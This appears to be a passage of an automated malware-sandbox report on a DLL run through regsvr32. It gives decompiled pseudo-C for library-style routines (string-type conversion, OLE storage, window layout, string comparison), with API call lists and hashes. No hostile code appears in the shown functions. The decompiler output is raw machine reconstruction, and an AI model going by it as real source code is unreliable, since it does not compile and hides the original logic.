                                                                                                            				_t69 = __ecx;
                                                                                                            				_push(0x1c);
                                                                                                            				_push(0x10042730);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t83 = 0;
                                                                                                            				_t91 =  *0x1004f740 - _t83; // 0x1
                                                                                                            				if(_t91 == 0) {
                                                                                                            					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
                                                                                                            						_t65 = GetLastError();
                                                                                                            						__eflags = _t65 - 0x78;
                                                                                                            						if(_t65 == 0x78) {
                                                                                                            							 *0x1004f740 = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f740 = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t42 =  *0x1004f740; // 0x1
                                                                                                            				if(_t42 == 2 || _t42 == _t83) {
                                                                                                            					_t67 =  *(_t85 + 0x1c);
                                                                                                            					__eflags = _t67 - _t83;
                                                                                                            					if(_t67 == _t83) {
                                                                                                            						_t67 =  *0x1004f724; // 0x0
                                                                                                            					}
                                                                                                            					_t77 =  *(_t85 + 0x18);
                                                                                                            					__eflags = _t77;
                                                                                                            					if(_t77 == 0) {
                                                                                                            						_t77 =  *0x1004f734; // 0x0
                                                                                                            					}
                                                                                                            					_t43 = E1001A444(_t67, _t67);
                                                                                                            					__eflags = _t43 - 0xffffffff;
                                                                                                            					if(_t43 != 0xffffffff) {
                                                                                                            						__eflags = _t43 - _t77;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L29:
                                                                                                            							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                                                            							__eflags = _t83;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_push(_t83);
                                                                                                            								E100107C8(_t67, _t78, _t83, __eflags);
                                                                                                            							}
                                                                                                            							_t45 = _t78;
                                                                                                            							goto L32;
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(_t85 + 0x10);
                                                                                                            						_push( *(_t85 + 0xc));
                                                                                                            						_push(_t43);
                                                                                                            						_push(_t77);
                                                                                                            						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
                                                                                                            						__eflags = _t83;
                                                                                                            						if(_t83 == 0) {
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						 *(_t85 + 0xc) = _t83;
                                                                                                            						goto L29;
                                                                                                            					} else {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t42 != 1) {
                                                                                                            						L25:
                                                                                                            						_t45 = 0;
                                                                                                            						L32:
                                                                                                            						return E1001254F(_t45);
                                                                                                            					}
                                                                                                            					 *(_t85 - 0x24) = _t83;
                                                                                                            					 *(_t85 - 0x20) = _t83;
                                                                                                            					if( *(_t85 + 0x18) == _t83) {
                                                                                                            						_t62 =  *0x1004f734; // 0x0
                                                                                                            						 *(_t85 + 0x18) = _t62;
                                                                                                            					}
                                                                                                            					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                                                            					 *(_t85 - 0x28) = _t79;
                                                                                                            					if(_t79 == 0) {
                                                                                                            						goto L25;
                                                                                                            					} else {
                                                                                                            						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                            						_t68 = _t79 + _t79;
                                                                                                            						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                                                            						 *(_t85 - 0x18) = _t86;
                                                                                                            						_t84 = _t86;
                                                                                                            						 *(_t85 - 0x2c) = _t84;
                                                                                                            						E10011C50(_t84, 0, _t79 + _t79);
                                                                                                            						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                                                            						_t99 = _t84;
                                                                                                            						if(_t84 != 0) {
                                                                                                            							L15:
                                                                                                            							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                                                            							if(_t58 != 0) {
                                                                                                            								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                                                            							}
                                                                                                            							_t102 =  *(_t85 - 0x20);
                                                                                                            							if( *(_t85 - 0x20) != 0) {
                                                                                                            								_push(_t84);
                                                                                                            								E100107C8(_t68, _t79, _t84, _t102);
                                                                                                            							}
                                                                                                            							_t45 =  *(_t85 - 0x24);
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							_push(_t79);
                                                                                                            							_push(2);
                                                                                                            							_t84 = E1001382A(_t68, _t79, _t84, _t99);
                                                                                                            							if(_t84 == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							 *(_t85 - 0x20) = 1;
                                                                                                            							goto L15;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                                                            • GetLastError.KERNEL32 ref: 10018473
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3581945363-4125583295
                                                                                                            • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                                                            • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E1000B89E(intOrPtr __ecx) {
                                                                                                            				void* _t115;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr* _t120;
                                                                                                            				void* _t121;
                                                                                                            				intOrPtr* _t122;
                                                                                                            				intOrPtr* _t124;
                                                                                                            				intOrPtr* _t126;
                                                                                                            				void _t128;
                                                                                                            				intOrPtr* _t130;
                                                                                                            				long _t133;
                                                                                                            				void* _t134;
                                                                                                            				void* _t135;
                                                                                                            				void* _t136;
                                                                                                            				void _t138;
                                                                                                            				void _t140;
                                                                                                            				void* _t142;
                                                                                                            				void* _t143;
                                                                                                            				void* _t146;
                                                                                                            				void* _t147;
                                                                                                            				void _t148;
                                                                                                            				void* _t150;
                                                                                                            				intOrPtr* _t152;
                                                                                                            				void* _t153;
                                                                                                            				void _t157;
                                                                                                            				void* _t158;
                                                                                                            				void _t160;
                                                                                                            				intOrPtr* _t162;
                                                                                                            				void* _t167;
                                                                                                            				intOrPtr* _t169;
                                                                                                            				intOrPtr* _t171;
                                                                                                            				intOrPtr* _t173;
                                                                                                            				void* _t174;
                                                                                                            				intOrPtr* _t176;
                                                                                                            				intOrPtr _t187;
                                                                                                            				intOrPtr* _t207;
                                                                                                            				void* _t211;
                                                                                                            				void* _t226;
                                                                                                            				void* _t227;
                                                                                                            				void* _t228;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aeb1, _t228);
                                                                                                            				_t176 = __ecx + 0x4c;
                                                                                                            				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
                                                                                                            				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
                                                                                                            				 *(_t228 + 0x14) = _t115;
                                                                                                            				if(_t115 < 0) {
                                                                                                            					L51:
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
                                                                                                            					return _t115;
                                                                                                            				}
                                                                                                            				 *(_t228 - 0x10) = 0;
                                                                                                            				 *(_t228 - 0x14) = 0;
                                                                                                            				 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                                                            				E1000A4B6(__ecx, __ecx + 0x3c);
                                                                                                            				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
                                                                                                            				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
                                                                                                            				if(_t119 != 0) {
                                                                                                            					L4:
                                                                                                            					_t226 =  *(_t228 + 0xc);
                                                                                                            					if(_t226 == 0) {
                                                                                                            						__eflags =  *(_t228 + 0x10);
                                                                                                            						if( *(_t228 + 0x10) != 0) {
                                                                                                            							L15:
                                                                                                            							_t120 =  *_t176;
                                                                                                            							_t211 = _t228 - 0x14;
                                                                                                            							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
                                                                                                            							__eflags = _t121;
                                                                                                            							if(_t121 < 0) {
                                                                                                            								L42:
                                                                                                            								if( *(_t228 + 0x14) >= 0) {
                                                                                                            									L45:
                                                                                                            									_t122 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            									if(_t122 != 0) {
                                                                                                            										 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                            									}
                                                                                                            									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
                                                                                                            										 *(_t228 + 0x14) = 1;
                                                                                                            									}
                                                                                                            									_t115 =  *(_t228 + 0x14);
                                                                                                            									goto L51;
                                                                                                            								}
                                                                                                            								L43:
                                                                                                            								_t124 =  *_t176;
                                                                                                            								if(_t124 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
                                                                                                            									_t126 =  *_t176;
                                                                                                            									 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                            									 *_t176 = 0;
                                                                                                            								}
                                                                                                            								goto L45;
                                                                                                            							}
                                                                                                            							__eflags = _t226;
                                                                                                            							if(_t226 != 0) {
                                                                                                            								__eflags =  *(_t228 + 0x10);
                                                                                                            								if( *(_t228 + 0x10) == 0) {
                                                                                                            									 *(_t228 + 0x14) = 0x8000ffff;
                                                                                                            									L36:
                                                                                                            									_t128 =  *(_t228 - 0x14);
                                                                                                            									L37:
                                                                                                            									 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                                                            									L38:
                                                                                                            									if( *(_t228 + 0x14) < 0) {
                                                                                                            										goto L43;
                                                                                                            									}
                                                                                                            									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
                                                                                                            										_t187 =  *((intOrPtr*)(_t228 - 0x20));
                                                                                                            										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
                                                                                                            											_t130 =  *_t176;
                                                                                                            											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L42;
                                                                                                            								}
                                                                                                            								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
                                                                                                            								__eflags = _t211;
                                                                                                            								 *(_t228 - 0x2c) = _t133;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									L29:
                                                                                                            									 *(_t228 + 0x14) = 0x8007000e;
                                                                                                            									 *(_t228 + 0x10) = 0;
                                                                                                            									L30:
                                                                                                            									__eflags =  *(_t228 + 0x10);
                                                                                                            									 *(_t228 - 0x1c) = 0;
                                                                                                            									if( *(_t228 + 0x10) == 0) {
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									_t134 = _t228 - 0x1c;
                                                                                                            									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
                                                                                                            									__eflags = _t134;
                                                                                                            									 *(_t228 + 0x14) = _t134;
                                                                                                            									if(_t134 < 0) {
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									_t135 = _t228 - 0x18;
                                                                                                            									 *(_t228 - 0x18) = 0;
                                                                                                            									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
                                                                                                            									__eflags = _t135;
                                                                                                            									 *(_t228 + 0x14) = _t135;
                                                                                                            									if(_t135 >= 0) {
                                                                                                            										_t138 =  *(_t228 - 0x14);
                                                                                                            										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
                                                                                                            										_t140 =  *(_t228 - 0x18);
                                                                                                            										 *((intOrPtr*)( *_t140 + 8))(_t140);
                                                                                                            									}
                                                                                                            									_t136 =  *(_t228 - 0x1c);
                                                                                                            									L21:
                                                                                                            									 *((intOrPtr*)( *_t136 + 8))(_t136);
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            								if(__eflags < 0) {
                                                                                                            									L26:
                                                                                                            									_t142 = GlobalAlloc(0, _t133);
                                                                                                            									__eflags = _t142;
                                                                                                            									 *(_t228 + 0x10) = _t142;
                                                                                                            									if(_t142 == 0) {
                                                                                                            										goto L29;
                                                                                                            									}
                                                                                                            									_t143 = GlobalLock(_t142);
                                                                                                            									__eflags = _t143;
                                                                                                            									if(_t143 == 0) {
                                                                                                            										goto L29;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
                                                                                                            									GlobalUnlock( *(_t228 + 0x10));
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								__eflags = _t133 - 0xffffffff;
                                                                                                            								if(_t133 >= 0xffffffff) {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t146 = _t228 + 0xc;
                                                                                                            							 *(_t228 + 0xc) = 0;
                                                                                                            							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
                                                                                                            							__eflags = _t146;
                                                                                                            							 *(_t228 + 0x14) = _t146;
                                                                                                            							if(_t146 < 0) {
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            							_t147 = _t228 + 0x10;
                                                                                                            							 *(_t228 + 0x10) = 0;
                                                                                                            							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
                                                                                                            							__eflags = _t147;
                                                                                                            							 *(_t228 + 0x14) = _t147;
                                                                                                            							if(_t147 >= 0) {
                                                                                                            								_t148 =  *(_t228 - 0x14);
                                                                                                            								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
                                                                                                            								_t150 =  *(_t228 + 0x10);
                                                                                                            								 *((intOrPtr*)( *_t150 + 8))(_t150);
                                                                                                            							}
                                                                                                            							_t136 =  *(_t228 + 0xc);
                                                                                                            							goto L21;
                                                                                                            						}
                                                                                                            						L10:
                                                                                                            						_t152 =  *_t176;
                                                                                                            						_t214 = _t228 - 0x10;
                                                                                                            						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
                                                                                                            						__eflags = _t153;
                                                                                                            						if(_t153 < 0) {
                                                                                                            							goto L15;
                                                                                                            						} else {
                                                                                                            							__eflags = _t226;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								E1002A986(_t228 - 0x74, _t214, __eflags);
                                                                                                            								 *(_t228 - 4) = 0;
                                                                                                            								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
                                                                                                            								_t157 =  *(_t228 - 0x10);
                                                                                                            								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
                                                                                                            								_t46 = _t228 - 4;
                                                                                                            								 *_t46 =  *(_t228 - 4) | 0xffffffff;
                                                                                                            								__eflags =  *_t46;
                                                                                                            								 *(_t228 + 0x14) = _t158;
                                                                                                            								E1002A941(_t228 - 0x74, _t228 - 0x2c);
                                                                                                            							} else {
                                                                                                            								_t160 =  *(_t228 - 0x10);
                                                                                                            								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
                                                                                                            							}
                                                                                                            							_t128 =  *(_t228 - 0x10);
                                                                                                            							goto L37;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( *(_t228 + 0x10) != 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_t162 =  *_t176;
                                                                                                            					_push(_t228 + 8);
                                                                                                            					_push(0x10043198);
                                                                                                            					_push(_t162);
                                                                                                            					if( *((intOrPtr*)( *_t162))() < 0) {
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(3);
                                                                                                            					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						 *(_t228 + 0x10) = 0;
                                                                                                            						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
                                                                                                            						_t207 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
                                                                                                            						_t169 =  *((intOrPtr*)(_t228 + 8));
                                                                                                            						 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                                                            						 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                                                            						goto L38;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t171 =  *_t176;
                                                                                                            				_t227 = __ecx + 0x6c;
                                                                                                            				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
                                                                                                            				if(( *(_t227 + 2) & 0x00000002) == 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t173 =  *_t176;
                                                                                                            				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
                                                                                                            				 *(_t228 + 0x14) = _t174;
                                                                                                            				if(_t174 < 0) {
                                                                                                            					goto L43;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                                                              • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                                                              • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                                                              • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                                                            • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 645133905-0
                                                                                                            • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                                                            • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                                                            				int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				int _v16;
                                                                                                            				int _v20;
                                                                                                            				struct tagRECT _v36;
                                                                                                            				void* _v40;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t61;
                                                                                                            				int _t62;
                                                                                                            				signed short _t63;
                                                                                                            				void* _t64;
                                                                                                            				void* _t72;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				signed int _t87;
                                                                                                            				struct HWND__* _t91;
                                                                                                            				void* _t92;
                                                                                                            
                                                                                                            				_t72 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = _a28;
                                                                                                            				_v16 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				if(_a24 == 0) {
                                                                                                            					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            				}
                                                                                                            				_t61 = _a16 & 0xffff7fff;
                                                                                                            				_a24 = _t61;
                                                                                                            				if(_t61 == 1) {
                                                                                                            					_v40 = _v40 & 0x00000000;
                                                                                                            				} else {
                                                                                                            					_v40 = BeginDeferWindowPos(8);
                                                                                                            				}
                                                                                                            				_t62 = GetTopWindow( *(_t72 + 0x1c));
                                                                                                            				while(1) {
                                                                                                            					_t91 = _t62;
                                                                                                            					if(_t91 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t63 = GetDlgCtrlID(_t91);
                                                                                                            					_push(_t91);
                                                                                                            					_t87 = _t63 & 0x0000ffff;
                                                                                                            					_t64 = E10022115();
                                                                                                            					if(_t87 != _a12) {
                                                                                                            						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
                                                                                                            							SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_v8 = _t91;
                                                                                                            					}
                                                                                                            					_t62 = GetWindow(_t91, 2);
                                                                                                            				}
                                                                                                            				if(_a24 != 1) {
                                                                                                            					if(_a12 != 0 && _v8 != 0) {
                                                                                                            						_t62 = E100220EE(_t92, _v8);
                                                                                                            						if(_a24 == 2) {
                                                                                                            							_t85 = _a20;
                                                                                                            							_v36.left = _v36.left +  *_t85;
                                                                                                            							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                                                            							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                                                            							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                                                            						}
                                                                                                            						if((_a17 & 0x00000080) == 0) {
                                                                                                            							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                                                            							_t62 = E10020D81( &_v40, _v8,  &_v36);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_v40 != 0) {
                                                                                                            						_t62 = EndDeferWindowPos(_v40);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_a28 == 0) {
                                                                                                            						_t62 = _a20;
                                                                                                            						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                                                            						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                                                            						 *_t62 = 0;
                                                                                                            						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                                                            					} else {
                                                                                                            						_t62 = CopyRect(_a20,  &_v36);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t62;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1228040700-0
                                                                                                            • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                                                            • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				short _v528;
                                                                                                            				short _v1048;
                                                                                                            				short _v1568;
                                                                                                            				intOrPtr _t18;
                                                                                                            				int _t20;
                                                                                                            				int _t21;
                                                                                                            				void* _t23;
                                                                                                            				char* _t32;
                                                                                                            				int _t37;
                                                                                                            				char* _t42;
                                                                                                            				void* _t47;
                                                                                                            				void* _t49;
                                                                                                            
                                                                                                            				_t18 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t42 = _a4;
                                                                                                            				_v8 = _t18;
                                                                                                            				if(lstrcmpiA(_t42, _a8) == 0) {
                                                                                                            					_t20 = GetSystemMetrics(0x2a);
                                                                                                            					if(_t20 != 0) {
                                                                                                            						_t21 = lstrlenA(_t42);
                                                                                                            						if(_t21 != lstrlenA(_a8)) {
                                                                                                            							L13:
                                                                                                            							_t23 = 0;
                                                                                                            						} else {
                                                                                                            							_t37 = GetThreadLocale();
                                                                                                            							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
                                                                                                            							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
                                                                                                            							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
                                                                                                            							_t32 = _t42;
                                                                                                            							if( *_t42 == 0) {
                                                                                                            								L10:
                                                                                                            								_t23 = 1;
                                                                                                            							} else {
                                                                                                            								_t47 = 0;
                                                                                                            								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
                                                                                                            									_t47 = _t47 + 2;
                                                                                                            									if( *_t32 != 0) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L10;
                                                                                                            									}
                                                                                                            									goto L11;
                                                                                                            								}
                                                                                                            								goto L13;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L11:
                                                                                                            					} else {
                                                                                                            						_t23 = _t20 + 1;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t23 = 0;
                                                                                                            				}
                                                                                                            				return E100117AE(_t23, _v8);
                                                                                                            			}
















                                                                                                            0x10025431

                                                                                                            APIs
                                                                                                            • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            • GetSystemMetrics.USER32 ref: 10025388
                                                                                                            Memory Dump Source
